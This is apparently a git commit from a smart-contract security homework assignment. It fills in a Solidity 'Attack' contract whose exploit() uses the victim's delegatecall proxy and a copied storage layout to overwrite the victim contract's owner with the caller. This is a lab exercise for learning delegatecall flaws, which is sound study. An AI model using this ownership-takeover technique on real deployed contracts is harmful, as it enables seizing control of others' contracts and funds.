feat: complete exploit

2024-03-21 23:24:00 +08:00 · 2024-03-21 23:24:00 +08:00 · d178a24104
commit d178a24104
parent 8e1fd3c4fe
1 changed files with 15 additions and 0 deletions
--- a/hw1/src/Delegation/Delegation.sol
+++ b/hw1/src/Delegation/Delegation.sol
@ -10,6 +10,13 @@ contract Attack {
    address internal immutable victim;
    // TODO: Declare some variable here
    // Note: Checkout the storage layout in victim contract
+    uint256 var0 = 12345;
+    uint8 var1 = 32;
+    string private var2;
+    address private var3;
+    uint8 private var4;
+    address public owner;
+    mapping(address => bool) public result;

    constructor(address addr) payable {
        victim = addr;
@ -17,9 +24,17 @@ contract Attack {

    // NOTE: You might need some malicious function here

+    function change_owner(address EOA) public {
+        owner = EOA;
+        result[EOA] = true;
+    }
+
    function exploit() external {
        // TODO: Add your implementation here
        // Note: Make sure you know how delegatecall works
        // bytes memory data = ...
+        bytes memory data = abi.encodeWithSignature("change_owner(address)", msg.sender);
+        ID31eg4t3(victim).proxyCall(data);
    }
+
 }